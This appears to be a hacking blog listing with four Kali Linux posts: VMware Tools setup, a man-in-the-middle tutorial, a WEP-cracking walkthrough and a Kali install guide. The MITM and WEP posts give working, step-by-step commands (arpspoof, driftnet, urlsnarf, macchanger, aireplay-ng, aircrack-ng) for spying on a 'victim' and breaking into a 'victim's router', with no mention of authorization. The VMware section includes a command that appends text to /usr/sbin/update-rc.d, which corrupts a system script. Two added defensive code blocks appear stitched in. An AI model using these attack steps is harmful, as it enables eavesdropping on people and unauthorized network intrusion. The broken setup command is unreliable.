Showing posts with label Kali. Show all posts

Tuesday, January 20, 2015

Installing VMware Tools in Kali

Should you decide to create your own VMware installation of Kali Linux rather than using the pre-made VMware images available on the official Kali Linux site, you will need to follow the instructions below to install VMware Tools in your Kali installation. You can install either open-vm-tools or the native VMware Tools.

Installing open-vm-Tools

This is probably the easiest way to get "VMware Tools" functionality inside a Kali VMware guest.
apt-get install open-vm-tools

This should be sufficient, but if you feel that this was way too easy, then you are up for an adventure. Without knowledge of the CLI, what follows might look like a nightmare.

Installing VMware Tools in Kali

If open-vm-tools does not work for you, or if you prefer the native VMware Tools, begin by installing some packages that are required by the VMware Tools installer:
echo cups enabled >> /usr/sbin/update-rc.d
echo vmware-tools enabled >> /usr/sbin/update-rc.d

apt-get install gcc make linux-headers-$(uname -r)
ln -s /usr/src/linux-headers-$(uname -r)/include/generated/uapi/linux/version.h /usr/src/linux-headers-$(uname -r)/include/linux/
Next, attach the VMware Tools ISO by clicking "Install VMware Tools" in the appropriate menu. Once the VMware Tools ISO has been attached to the virtual machine, mount the drive and copy the VMware Tools installer to /tmp/.
mkdir /mnt/vmware
mount /dev/cdrom /mnt/vmware/
cp -rf /mnt/vmware/VMwareTools* /tmp/
Then, change directory to /tmp/, extract the tarball and start the installer:
cd /tmp/
tar zxpf VMwareTools-*.tar.gz
cd vmware-tools-distrib/
./vmware-install.pl
Follow the prompts for the VMware Tools installation and you are done.
Lastly, to get rid of possible VMWare service errors, edit the /etc/init.d/vmware-tools script, and at around line 876, change:
  # POSIX shell uses '!' for negation during bracket expansion.
  # See http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html
  IFS=.
  set -- `uname -r`
to:
  # POSIX shell uses '!' for negation during bracket expansion.
  # See http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html
  IFS=.
  set -- `uname -r|cut -d"-" -f1`
Once changed, restart the VMware Tools service.
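To see why that one-line change to the init script matters, here is an added example (not code from the post or from VMware): it splits a kernel release string on "." the way /etc/init.d/vmware-tools does with IFS=. and set --, once on the raw string and once after the cut -d"-" -f1 fix. The release string 3.18.0-kali1-amd64 is constructed for the example; the point is only that a Debian/Kali style "-flavour" suffix lands in the third field, which the script then tries to compare as a number.

```shell
# Added example (not from the post): why /etc/init.d/vmware-tools needs the
# `cut -d"-" -f1` change. The init script splits the kernel release on '.'
# with IFS=. and then compares the fields numerically; a Debian/Kali style
# release string carries a "-<flavour>" suffix that lands in the third field.

# Sample release string in the Kali format (constructed for this example).
SAMPLE_RELEASE='3.18.0-kali1-amd64'

kernel_fields() {
    # Split "$1" on '.' exactly as the init script does (IFS=. ; set --),
    # restoring IFS afterwards. Prints the three fields separated by spaces.
    _old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$_old_ifs
    printf '%s %s %s\n' "$1" "$2" "$3"
}

strip_suffix() {
    # The post's fix: keep only the part before the first '-'.
    printf '%s\n' "$1" | cut -d"-" -f1
}

patch_field_is_numeric() {
    # Returns 0 when the third field is a plain integer, i.e. safe for the
    # script's [ "$3" -ge N ] style tests; returns 1 otherwise.
    # POSIX shell uses '!' for negation in the bracket expression below.
    set -- $(kernel_fields "$1")
    case $3 in
        ''|*[!0-9]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Stand-alone demonstration.
echo "raw:   $(kernel_fields "$SAMPLE_RELEASE")"
echo "fixed: $(kernel_fields "$(strip_suffix "$SAMPLE_RELEASE")")"
if patch_field_is_numeric "$SAMPLE_RELEASE"; then
    echo "raw third field is numeric"
else
    echo "raw third field is NOT numeric (the init script's numeric test would fail)"
fi
```

Run it with sh or bash: the raw split gives "3 18 0-kali1-amd64", so any [ "$3" -ge ... ] test in the script errors out, while the fixed split gives "3 18 0". Restoring IFS afterwards matters too; the init script leaves IFS=. set, which is fine inside its own block but would break later word splitting if copied elsewhere.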

Slow Mouse Movement in VMware

If your mouse movement is slow and sluggish in a Kali Linux VMware guest, try installing the xserver-xorg-input-vmmouse package in the Kali guest.
apt-get install xserver-xorg-input-vmmouse
reboot

Thursday, January 15, 2015

Kali Linux in the Middle Attack

Today's tutorial covers the Kali Linux man-in-the-middle attack. How do you perform a man-in-the-middle attack using Kali Linux? We will go through the process step by step.

I believe most of you already know the concept of a man-in-the-middle attack, but if you still don't, here is the definition from Wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Scenario:
This is a simple scenario, and I tried to draw it in a picture.

Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8

Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T Kali shortcut) and configure the Kali Linux machine to allow packet forwarding, because to act as the man in the middle, Kali Linux must act as a router between the "real router" and the victim. Read the tutorial here on how to set up packet forwarding in Linux.
2. You can change your terminal layout to make the view friendlier and easier to monitor by splitting the Kali Linux terminal window.
3. The next step is to set up arpspoof between the victim and the router.
arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. Then set up arpspoof to capture all packets from the router to the victim.
arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After steps three and four, all packets sent or received by the victim should pass through the attacker machine.
6. Now we can use driftnet to monitor all of the victim's image traffic.
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, just run this:
driftnet -i eth0
When the victim browses a website with images, driftnet captures the image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal.
8. For the next step we will capture website information by using urlsnarf. To use urlsnarf, just run this:
urlsnarf -i eth0
and urlsnarf will start capturing every website address visited by the victim machine.

9. When the victim browses a website, the attacker will see the address the victim visited.
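From the defender's side, the attack above leaves a visible trace in the neighbour (ARP) table: the router's IP suddenly resolves to a second MAC, and one MAC answers for both the router and the victim. The following is an added example, not part of the post, that checks a log of "<ip> <mac>" entries for exactly those two symptoms. The entries and all MAC addresses are constructed; the IPs are the ones from the scenario above, and the comment showing how such entries could be collected on a real host (ip -4 neigh show) is an assumption about the reader's environment.

```shell
# Added example (not from the post): spotting, from the defender's side, the
# neighbour-table symptoms that ARP spoofing produces. Input is one entry per
# line, "<ip> <mac>", collected over time; on a real Linux host such lines
# could be gathered periodically with:  ip -4 neigh show | awk '{print $1, $5}'
# All MAC addresses below are constructed; the IPs are the scenario's.
ARP_SAMPLE='192.168.8.8 00:11:22:33:44:01
192.168.8.90 00:11:22:33:44:02
192.168.8.93 00:11:22:33:44:03
192.168.8.8 00:11:22:33:44:03
192.168.8.90 00:11:22:33:44:03'

ip_with_several_macs() {
    # Reads "<ip> <mac>" lines on stdin and prints every IP that was seen with
    # more than one MAC (e.g. the router's IP suddenly mapping to a new MAC).
    awk '{
        k = $1 "|" $2
        if (!(k in seen)) { seen[k] = 1; macs[$1] = macs[$1] " " $2; n[$1]++ }
    }
    END { for (ip in n) if (n[ip] > 1) print ip ":" macs[ip] }' | sort
}

mac_with_several_ips() {
    # Same input; prints every MAC that answers for more than one IP. In the
    # scenario above the spoofing host's MAC claims both router and victim.
    awk '{
        k = $1 "|" $2
        if (!(k in seen)) { seen[k] = 1; ips[$2] = ips[$2] " " $1; n[$2]++ }
    }
    END { for (mac in n) if (n[mac] > 1) print mac ":" ips[mac] }' | sort
}

# Stand-alone demonstration.
echo "IPs seen with more than one MAC:"
printf '%s\n' "$ARP_SAMPLE" | ip_with_several_macs
echo "MACs answering for more than one IP:"
printf '%s\n' "$ARP_SAMPLE" | mac_with_several_ips
```

Both checks flag the sample: 192.168.8.8 and 192.168.8.90 each appear with two MACs, and 00:11:22:33:44:03 claims three IPs. A plain IP-to-MAC change can also be legitimate (a replaced router), so these are alerts to investigate rather than proof; the usual mitigations are a static ARP entry for the gateway on sensitive hosts, an ARP monitor such as arpwatch, and Dynamic ARP Inspection on managed switches.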



Wednesday, January 7, 2015

Tutorial: Hacking WEP

([For this tutorial you need external WiFi adapter] OR [have BackTrack installed in your Hard Drive, not a virtual machine])
(Otherwise, look for the method using normal windows OS in the 'In too Deep' section)

Open up BackTrack, Login and then follow the below steps

1. Open konsole and type the following to start up network connections.
»/etc/init.d/networking start

2. Now we are going to put the network card into monitor mode. Start by typing the following.
»airmon-ng
(You will find your Interface here)

3. So first start monitor mode on your interface:
»airmon-ng start wlan0
or
»airmon-ng start wlan1
(this command depends on what your wireless card shows up as; replace the interface name as needed)

4. Let's spoof your MAC address first by typing the following commands.

»ifconfig wlan1 down
»macchanger -r wlan1
»ifconfig wlan1 up

This changes the MAC address that the network we are connecting to will see for our adapter.

5. Time to start finding our victim's router; type the following in konsole.
»airodump-ng mon0

This will show the entire list of WiFi networks your adapter can see. Once you find one that suits your interest, continue:

6. Once found, press CTRL + C, copy the BSSID, get out of airodump and then type into a new konsole: (Read slowly!)

»airodump-ng -c [channel number] --bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)

For Example: »airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w Newcapfile mon0

(*IMPORTANT: You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID and channel number from the previous steps, 'mon0' or 'mon1' depends on your adapter, and for the name of the cap file you can type in any file name like 'MyCapFile')

7. Let's start the passphrase cracking. We need to collect around 30,000-50,000 IVs (packets). We start by sending fake authentication requests. To do this open a new konsole and type:

»aireplay-ng -1 1 -a [The BSSID of the router] mon0

example: »aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0

8. Almost done, we just need to continue the capturing process. Open another konsole and type:

»aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution Protocol; it is used to find a device's hardware address from its IP address.)

Collect a good number of IVs, around 30,000-50,000 (the more the better). Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours. They are stored in the .cap file. Once you've captured enough packets, press CTRL + C to stop the process and continue to step 9.

9. Time to start cracking that cap file :D You can think of it like this: every single packet contains a bit of leaked password. We've captured a large number of packets, compiled them in the .cap file, and now we're going to extract tiny bits of information from each packet and piece them together to give us the passphrase. Open a new konsole and type:

»aircrack-ng -b [bssid] [file name]-01.cap

example: »aircrack-ng -b 11:22:33:44:55:66 wepcap-01.cap

10. Wait a few seconds and we should now be presented with the key to log in to the router.

Key Commands.
►wlan0 = Interface (Examples: wlan0, ath0, eth0)
►ch = The channel the target is on (Examples: 6, 11. You can find it out using your wifi adapter's interface)
►bssid = MAC address of target (Examples: 11:22:33:B1:44:C2)
►ssid = Name of target (Examples: linksys, default)
►filename = Name of .cap file (Examples: wep123, target, anythingyouwant)
►fragment-*.xor = The * being replaced by a number (Examples: fragment-25313-0123.xor)
►PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Tutorial: Installing Kali

Around April 2014, www.backtrack-linux.org officially stopped supporting BackTrack downloads. This was mainly due to the release of Kali 1.0.6, which fixed the majority of the bugs in the OS. Although BackTrack is still available through torrents, it's better to move on to newer and better things, namely Kali.

In a nutshell, mathematics tells us the difference between Windows 8 and Windows 8.1 is 0.1; similarly, BackTrack and Kali are not that different. Kali is like the next revamped version of BackTrack. If you prefer to keep using BackTrack, you're not exactly missing out on something huge (yet). But still, it's always better to use up-to-date software, and nobody knows that better than us hackers. BackTrack ruled the hacking universe for nearly 8 years (released in 2006) and now the torch is in the hands of Kali. So, here we'll be taking a brief look at the two operating systems, their differences, the advantages of Kali over BackTrack and finally how to install Kali.

Differences between Kali & BackTrack 
Like I said, Kali is not so different from BackTrack. At first look, you'll probably notice the slight GUI change. The tools are in different places, but it shouldn't take long to get used to. One major difference beginners may not notice is that Kali is built on Debian Linux instead of Ubuntu Linux. The Debian vs Ubuntu debate is a whole other topic, so we're not getting into that. Plus, you don't need to fill your head with unnecessary information. Kali can be thought of as the next iteration of BackTrack. The developers are the same, the functionality is almost the same and the GUI change is definitely for the better.
The advantages of Using Kali Over BackTrack 
•'Some' new tools. 
•The new GNOME interface. 
•Regular updates, updated tools like Metasploit, p0f etc. 
•A build specifically designed for the ARM architecture (read: 'Android smartphone compatible'). 
•All tool directories are in the PATH variable, so any tool can be called from anywhere. 
(Also now that backtrack has no future, we don't have that much of a choice) 

There's no game changer advantage of Kali over Backtrack. But now that Backtrack is no longer going to update, vulnerabilities will start popping up in the OS which will be fixed in Kali but not Backtrack. The last thing a hacker needs is to get hacked him/herself. Let's install Kali now. If you've installed Backtrack earlier, the installation process of Kali is practically identical. 

Step 1: Download & Burn Kali 
Head over to: http://www.kali.org/downloads/ 

There are quite a few options; the only ones you need to worry about are 64 bit or 32 bit and torrent or direct download. Check out the properties page of your 'My Computer'. If your architecture (OS and processor) is 64 bit, download the 64 bit one. If you're not sure, you may simply download the 32-bit version, which works on all systems. (If you have 4GB or less RAM, 32 bit or 64 bit doesn't make a difference.) The download is around 3GB in size.

Below on that page you'll see two more versions, ARMEL and ARMHF. They are relevant when installing Kali on ARM hardware devices (like Android smartphones and tablets). But, right now we're trying to get Kali running on a PC. 

Once we've got the ISO file, you can either burn it to a DVD to install as a permanent OS on your system or you can create a bootable USB Drive using software like UNetBootin. (See the tutorial on Backtrack for exact instructions) 

Step 2: Install Kali 

We'll be installing Kali on a virtual machine. The two best virtualization systems are VMware and VirtualBox. They are both equally good, but VMware is paid. So, for a beginner hacker I recommend using VirtualBox. On startup, just like BackTrack, you can log in as "root" with a password of "toor". Then, type "startx" to start the X Window System.

Using a virtual machine may not always be ideal. The main disadvantage is performance. Running an OS on top of another OS is bound to cause lagging. A system with 4GB RAM should handle it sufficiently well as long as no other programs are running. For optimal performance, 6GB (or more) RAM is recommended.

Further, for wireless hacking using a virtual machine, we need an external wireless card or adapter. They are usually small pen drives using which you can connect to a wifi network. Also, they must be compatible with aircrack-ng, the main wifi hacking software. 

As mentioned before, you may also install it alongside your present OS so that both of them can mind their own business one at a time. To do that, you can use your burned DVD or USB drive and simply boot with the booting device jacked in. (You may need to alter the Booting Sequence through the BIOS menu). 

Once the booting begins, you can click on the Install Kali button and follow the steps in the install wizard. 

The disadvantages of using a VM are the advantages of using a dual boot system. Kali will run faster with less resources, you will not need an additional wireless card and you will not have the additional complexities of working in a VM. But installing another permanent OS may not be ideal for everyone. You may choose whichever method you like. If you have used another Linux distribution with the GNOME interface, you'll notice that the pull-down menus at the top of the desktop look familiar, just like Backtrack. Also just like backtrack, we can find all the same tools (and some new ones) in the same upper left corner applications menu categorized in the same way. One interesting menu is the "Top Ten Security Tools" menu. You'll find that it includes some of the most popular tools such as nmap, Metasploit, sqlmap, Wireshark, and aircrack-ng among others. Now you're all set and you can start hacking with Kali Linux! 

*Since Kali officially supports ARM hardware, almost all Android devices can run Kali. There's an app called 'Linux Deploy' on the Play Store which does all the heavy lifting for us. All we need to do is set a few options and hit install. The requirements for installing Kali on Android phones are: minimum Android version 2.1 (rooted), 5GB free space in any one place (internal or external storage), decent internet speed and some patience.

Here's the URL for the Linux Deploy app: 
https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy 

And here's the official tutorial for getting Kali up and running on your smartphone: 
http://www.kali.org/how-to/kali-linux-android-linux-deploy 

Linux Deploy basically lets the user select which Linux distribution they want to install, the processor architecture, mirror URL, installation path etc. If you simply want to get it up and running quickly, Linux deploy provides defaults that almost always work. Although very improbable, even if something does go wrong, the installation of Kali on your android phone is completely reversible. On hitting the Install button, Linux Deploy will start downloading the image file and then go on to install it. 

For exact instructions, head to the official tutorial URL given above. 
A few pointers: Make sure you select Kali Linux under the distribution tab. The download is approximately 2GB in size, so plan accordingly. There are two architecture types, ARMEL and ARMHF. ARMEL is for the ARMv4 instruction set and ARMHF is for the ARMv7 instruction set of the phone's processor. The majority of phones today have ARMv7 (or above), but if you have a relatively old model, you may wish to google your phone's specifications to find out which one you can run. One last thing: around 4GB minimum is recommended for the image size, but if you plan on installing a lot of tools you can manually change the image size in Linux Deploy.